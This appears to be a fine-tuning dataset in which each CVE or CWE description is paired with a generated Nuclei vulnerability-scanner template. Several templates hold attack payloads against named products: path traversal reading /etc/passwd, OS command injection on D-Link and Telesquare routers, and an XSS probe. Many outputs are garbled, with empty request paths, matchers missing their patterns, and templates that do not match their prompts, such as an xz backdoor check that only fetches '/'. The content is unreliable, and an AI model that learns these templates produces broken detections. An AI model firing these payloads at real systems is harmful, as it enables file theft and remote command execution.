Script-Related HTML Tags in a Web Page (CWE-80)\nSummary: The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"<\", \">\", and \"&\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.\nVulnerability Type: Improper Neutralization of Script-Related HTML Tags in a Web Page\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: wptouch-xss\n\ninfo:\n name: WordPress WPtouch <4.3.44 - Cross-Site Scripting\n author: akincibor\n severity: medium\n description: WordPress WPtouch plugin prior to 4.3.44 contains a cross-site scripting vulnerability. The plugin does not escape some URLs before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\">\" \n part: body\n - type: word\n words:\n - \"WPtouchCustom\" \n - \"WPtouchAjax\" \n - \"toplevel_page_wptouch-admin\" \n part: body\n condition: or\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-80"} {"instruction": "Generate a Nuclei template for CVE-2018-10823", "input": "Title: OS Command Injection in dlink dwr-116_firmware and others\nSummary: An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\nVulnerability Type: OS Command Injection\nSeverity: high\nAffected Products: dlink dwr-116_firmware, dlink dwr-512_firmware, dlink dwr-912_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-10823\n\ninfo:\n name: D-Link Routers - Remote Command Injection\n author: wisnupramoedya\n severity: high\n description: D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n tags: cve,cve2018,rce,iot,dlink,router,edb,seclists,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2018-10823"} {"instruction": "Generate a Nuclei template for CVE-2022-0968", "input": "Title: Vulnerability (CWE-190) in microweber microweber\nSummary: The microweber application allows large characters to insert in the input field \"fist & last name\" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in microweber/microweber in GitHub repository microweber/microweber prior to 1.2.12.\nVulnerability Type: Vulnerability (CWE-190)\nSeverity: medium\nAffected Products: microweber microweber\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0968\n\ninfo:\n name: Microweber <1.2.12 - Integer Overflow\n author: amit-jd\n severity: medium\n description: Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request.\n tags: cve,cve2022,overflow,microweber,cms,huntr,dos,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-0968"} {"instruction": "Generate a Nuclei template for CVE-2010-0972", "input": "Title: Path Traversal in g4j.laoneo com_gcalendar\nSummary: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: g4j.laoneo com_gcalendar\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-0972\n\ninfo:\n name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n tags: cve2010,cve,edb,joomla,lfi,g4j.laoneo,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2010-0972"} {"instruction": "Generate a Nuclei template for: PHPUnit Result Cache File Exposure", "input": "Title: PHPUnit Result Cache File Exposure\nSummary: PHPUnit Result Cache File Exposure. PHPUnit cache file is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: phpunit-result-cache-exposure\n\ninfo:\n name: PHPUnit Result Cache File Exposure\n author: DhiyaneshDk\n severity: low\n description: PHPUnit cache file is exposed.\n tags: config,exposure,devops,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.phpunit.result.cache\" \n matchers:\n - type: word\n words:\n - \"\"defects\"\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "phpunit-result-cache-exposure"} {"instruction": "Generate a Nuclei template for CVE-2020-29214", "input": "Title: SQL Injection in alumni_management_system_project alumni_management_system\nSummary: SQL injection vulnerability in SourceCodester Alumni Management System 1.0 allows the user to inject SQL payload to bypass the authentication via admin/login.php.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: alumni_management_system_project alumni_management_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-29214\n\ninfo:\n name: Alumni Management System 1.0 - SQL Injection\n author: arafatansari\n severity: critical\n description: SourceCodester Alumni Management System 1.0 contains a sql_injection caused by unsanitized input in admin/login.php, letting attackers bypass authentication, exploit requires injection of malicious SQL payload.\n tags: cve,cve2020,sqli,auth-bypass,cms,edb,alumni,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Welcome back Admin!\" \n - \"Alumni List\" \n part: body\n condition: and\n - type: word\n words:\n - \"#login-form\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2020-29214"} {"instruction": "Generate a Nuclei template for CVE-2012-4273", "input": "Title: Cross-Site Scripting (XSS) in ppfeufer 2-click-social-media-buttons\nSummary: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: ppfeufer 2-click-social-media-buttons\nIndicators: error, vulnerability detected", "output": "id: CVE-2012-4273\n\ninfo:\n name: 2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.\n tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"2 Click Social Media Buttons\" \n - \"Tags:\" \n condition: and\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2012-4273"} {"instruction": "Generate a Nuclei template for: MantisBT Installation Exposure", "input": "Title: MantisBT Installation Exposure\nSummary: MantisBT Installation Exposure. MantisBT is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: mantisbt-installer\n\ninfo:\n name: MantisBT Installation Exposure\n author: DhiyaneshDK\n severity: high\n description: MantisBT is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,mantisbt,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/install.php\" \n matchers:\n - type: word\n words:\n - \"Administration - Installation - MantisBT\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "mantisbt-installer"} {"instruction": "Generate a Nuclei template for CVE-2015-2996", "input": "Title: Path Traversal in sysaid sysaid\nSummary: Multiple directory traversal vulnerabilities in SysAid Help Desk before 15.2 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the fileName parameter to getGfiUpgradeFile or (2) cause a denial of service (CPU and memory consumption) via a .. (dot dot) in the fileName parameter to calculateRdsFileChecksum.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: sysaid sysaid\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-2996\n\ninfo:\n name: SysAid Help Desk <15.2 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n tags: cve2015,cve,sysaid,lfi,seclists,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\" \n - \"{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2015-2996"} {"instruction": "Generate a Nuclei template for CVE-2024-28000", "input": "Title: Vulnerability (CWE-266) in litespeedtech litespeed_cache\nSummary: Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.\nVulnerability Type: Vulnerability (CWE-266)\nSeverity: critical\nAffected Products: litespeedtech litespeed_cache\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-28000\n\ninfo:\n name: WordPress LiteSpeed Cache - Unauthenticated Privilege Escalation to Admin\n author: melmathari\n severity: critical\n description: Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.\n tags: cve,cve2024,wordpress,wp,wp-plugin,litespeed-cache,priv-esc,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-28000"} {"instruction": "Generate a Nuclei template for: ICO Malware Hash - Detect", "input": "Title: ICO Malware Hash - Detect\nSummary: ICO Malware Hash - Detect. Detection of malicious ICO files used in 3CX compromise\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ico-malware-hash\n\ninfo:\n name: ICO Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Detection of malicious ICO files used in 3CX compromise\n tags: malware,uta0040\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "ico-malware-hash"} {"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: wildcard-postmessage\n\ninfo:\n name: postMessage - Cross-Site Scripting\n author: pdteam\n severity: info\n description: postMessage contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and therefore steal cookie-based authentication credentials and launch other attacks.\n tags: xss,postmessage,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex", "category": "cwe", "severity": "high", "id": "CWE-79"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: garmin-connect\n\ninfo:\n name: Garmin connect User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Garmin connect user name information check was conducted.\n tags: osint,osint-health,garmin-connect,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://connect.garmin.com/modern/profile/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"window.ERROR_VIEW = null\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2025-54125", "input": "Title: Vulnerability (CWE-359) in xwiki xwiki\nSummary: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. XWiki Platform Legacy Old Core and XWiki Platform Old Core versions 1.1 through 16.4.6, 16.5.0-rc-1 through 16.10.4 and 17.0.0-rc-1 through 17.1.0, the XML export of a page in XWiki that can be triggered by any user with view rights on a page by appending ?xpage=xml to the URL includes password and email properties stored on a document that aren't named password or email. This is fixed in versions 16.4.7, 16.10.5 and 17.2.0-rc-1. To work around this issue, the file templates/xml.vm in the deployed WAR can be deleted if the XML isn't needed. There isn't any feature in XWiki itself that depends on the XML export.\nVulnerability Type: Vulnerability (CWE-359)\nSeverity: medium\nAffected Products: xwiki xwiki\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-54125\n\ninfo:\n name: XWiki XML View - Sensitive Information Exposure\n author: ritikchaddha\n severity: high\n description: A vulnerability in XWiki's XML view functionality exposes sensitive information such as passwords and email addresses that are stored in custom fields not explicitly named as password or email. This information disclosure occurs when accessing user profiles with the xml.vm template.\n tags: cve,cve2025,xwiki,exposure,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}{{path}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2025-54125"} {"instruction": "Generate a Nuclei template for CVE-2023-2227", "input": "Title: Vulnerability (CWE-285) in modoboa modoboa\nSummary: Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.\nVulnerability Type: Vulnerability (CWE-285)\nSeverity: critical\nAffected Products: modoboa modoboa\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-2227\n\ninfo:\n name: Modoboa < 2.1.0 - Improper Authorization\n author: ritikchaddha,princechaddha\n severity: critical\n description: Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.\n tags: cve,cve2023,modoboa,exposure,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"label\":\" \n - \"default_password\":\" \n - \"authentication_type\":\"local\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2023-2227"} {"instruction": "Generate a Nuclei template for: Atlantis Dashboard - Exposure", "input": "Title: Atlantis Dashboard - Exposure\nSummary: Atlantis Dashboard - Exposure. Atlantis Dashboard was discovered.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: atlantis-dashboard\n\ninfo:\n name: Atlantis Dashboard - Exposure\n author: DhiyaneshDK\n severity: medium\n description: Atlantis Dashboard was discovered.\n tags: misconfig,atlantis,runatlantis,exposure,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Repository\" \n - \"Project\" \n - \"Workspace\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "atlantis-dashboard"} {"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: erp-nc-directory-traversal\n\ninfo:\n name: ERP-NC - Local File Inclusion\n author: pikpikcu\n severity: high\n description: ERP-NC is vulnerable to local file inclusion.\n tags: lfi,erp-nc,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=\" \n matchers:\n - type: word\n words:\n - \"Client\" \n - \"ncwslogin.jsp\" \n - \"admin.jsp\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} {"instruction": "Generate a Nuclei template for: ACM Certificates Pre-expiration Renewal", "input": "Title: ACM Certificates Pre-expiration Renewal\nSummary: ACM Certificates Pre-expiration Renewal. Ensure AWS ACM SSL/TLS certificates are renewed at least 30 days before expiration to prevent service disruptions.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: acm-cert-renewal-30days\n\ninfo:\n name: ACM Certificates Pre-expiration Renewal\n author: princechaddha\n severity: medium\n description: Ensure AWS ACM SSL/TLS certificates are renewed at least 30 days before expiration to prevent service disruptions.\n tags: cloud,devops,aws,amazon,acm,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "acm-cert-renewal-30days"} {"instruction": "Generate a Nuclei template for CVE-2024-3094", "input": "Title: Vulnerability (CWE-506) in tukaani xz\nSummary: Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. \r\nThrough a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.\nVulnerability Type: Vulnerability (CWE-506)\nSeverity: critical\nAffected Products: tukaani xz\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-3094\n\ninfo:\n name: XZ - Embedded Malicious Code\n author: pdteam\n severity: critical\n description: Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.\n tags: cve,cve2024,local,code,xz,backdoor,tukaani,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2024-3094"} {"instruction": "Generate a Nuclei template for: Poste.io Admin Panel - Detect", "input": "Title: Poste.io Admin Panel - Detect\nSummary: Poste.io Admin Panel - Detect. Poste.io login panel was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: posteio-admin-panel\n\ninfo:\n name: Poste.io Admin Panel - Detect\n author: ritikchaddha\n severity: info\n description: Poste.io login panel was detected.\n tags: panel,poste,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/login\" \n matchers:\n - type: word\n words:\n - \"posteHiveQueue Agent\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "hivequeue-agent"} {"instruction": "Generate a Nuclei template for: Google Static Maps API Test", "input": "Title: Google Static Maps API Test\nSummary: Google Static Maps API Test. Tags: token-spray, google, maps\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-googlestaticmaps\n\ninfo:\n name: Google Static Maps API Test\n author: zzeitlin\n severity: info\n description: Google Static Maps API Test\n tags: token-spray,google,maps\n\nhttp:\n - method: GET\n path:\n - \"https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "api-googlestaticmaps"} {"instruction": "Generate a Nuclei template for: New Relic NerdGraph API Test", "input": "Title: New Relic NerdGraph API Test\nSummary: New Relic NerdGraph API Test. Tags: token-spray, newrelic, nerdgraph\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-nerdgraph\n\ninfo:\n name: New Relic NerdGraph API Test\n author: zzeitlin\n severity: info\n description: New Relic NerdGraph API Test\n tags: token-spray,newrelic,nerdgraph\n\nhttp:\n - method: POST\n path:\n - \"https://api.newrelic.com/graphql\" \n matchers:\n - type: word\n words:\n - \"errors\" \n part: body", "category": "generic", "severity": "info", "id": "api-nerdgraph"} {"instruction": "Generate a Nuclei template for CVE-2023-46818", "input": "Title: Code Injection in ispconfig ispconfig\nSummary: An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.\nVulnerability Type: Code Injection\nSeverity: high\nAffected Products: ispconfig ispconfig\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-46818\n\ninfo:\n name: ISPConfig - PHP Code Injection\n author: non-things\n severity: high\n description: An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.\n tags: cve,cve2023,ispconfig,php,rce,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"{{echo-cmd-hash}}\" \n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-46818"} {"instruction": "Generate a Nuclei template for CVE-2021-39226", "input": "Title: Authentication Bypass in grafana grafana and others\nSummary: Grafana is an open source data visualization platform. In affected versions unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths: /dashboard/snapshot/:key, or /api/snapshots/:key. If the snapshot \"public_mode\" configuration setting is set to true (vs default of false), unauthenticated users are able to delete the snapshot with the lowest database key by accessing the literal path: /api/snapshots-delete/:deleteKey. Regardless of the snapshot \"public_mode\" setting, authenticated users are able to delete the snapshot with the lowest database key by accessing the literal paths: /api/snapshots/:key, or /api/snapshots-delete/:deleteKey. The combination of deletion and viewing enables a complete walk through all snapshot data while resulting in complete snapshot data loss. This issue has been resolved in versions 8.1.6 and 7.5.11. If for some reason you cannot upgrade you can use a reverse proxy or similar to block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: grafana grafana, fedoraproject fedora\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-39226\n\ninfo:\n name: Grafana Snapshot - Authentication Bypass\n author: Evan Rubinstein\n severity: high\n description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).\n tags: cve2021,cve,grafana,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/snapshots/:key\" \n matchers:\n - type: word\n words:\n - \"\"isSnapshot\":true\" \n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-39226"} {"instruction": "Generate a Nuclei template for CVE-2021-46422", "input": "Title: OS Command Injection in telesquare sdt-cs3b1_firmware\nSummary: Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: telesquare sdt-cs3b1_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-46422\n\ninfo:\n name: SDT-CW3B1 1.1.0 - OS Command Injection\n author: badboycxcc,prajiteshsingh\n severity: critical\n description: Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol", "category": "cve", "severity": "critical", "id": "CVE-2021-46422"} {"instruction": "Generate a Nuclei template for: Ncast HD Intelligent Recording - Arbitrary File Reading", "input": "Title: Ncast HD Intelligent Recording - Arbitrary File Reading\nSummary: Ncast HD Intelligent Recording - Arbitrary File Reading. Ncast HD intelligent recording and broadcasting system has an arbitrary file reading vulnerability.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: ncast-lfi\n\ninfo:\n name: Ncast HD Intelligent Recording - Arbitrary File Reading\n author: pussycat0x\n severity: high\n description: Ncast HD intelligent recording and broadcasting system has an arbitrary file reading vulnerability.\n tags: ncast,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/developLog/downloadLog.php?name=../../../../etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"application/force-download\" \n part: content_type\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "ncast-lfi"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: apollo-adminservice-unauth\n\ninfo:\n name: Apollo Admin Service - Unauthenticated Access\n author: j4vaovo\n severity: medium\n description: ApolloAdminservice was able to be accessed without authentication.\n tags: misconfig,unauth,apollo,apolloadminservice,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/apps\" \n matchers:\n - type: word\n words:\n - \"appId\" \n - \"orgName\" \n - \"ownerName\" \n - \"dataChangeCreatedBy\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: keycloak-openid-config\n\ninfo:\n name: Keycloak OpenID Configuration - Detect\n author: rodnt\n severity: info\n description: Keycloak Openid configuration information was detected.\n tags: keycloak,config,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.well-known/openid-configuration\" \n - \"{{BaseURL}}/auth/realms/master/.well-known/openid-configuration\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"issuer\" \n - \"authorization_endpoint\" \n - \"token_endpoint\" \n - \"userinfo_endpoint\" \n - \"jwks_uri\" \n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Meilisearch - Detect", "input": "Title: Meilisearch - Detect\nSummary: Meilisearch - Detect. An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: meilisearch-detect\n\ninfo:\n name: Meilisearch - Detect\n author: userdehghani\n severity: info\n description: An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience.\n tags: meilisearch,detect,tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "meilisearch-detect"} {"instruction": "Generate a Nuclei template for CVE-2023-29204", "input": "Title: Vulnerability (CWE-601) in xwiki xwiki\nSummary: XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to bypass the existing security measures put in place to avoid open redirect by using a redirect such as `//mydomain.com` (i.e. omitting the `http:`). It was also possible to bypass it when using URL such as `http:/mydomain.com`. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1.\n\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: xwiki xwiki\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-29204\n\ninfo:\n name: XWiki - Open Redirect\n author: ritikchaddha\n severity: medium\n description: XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to 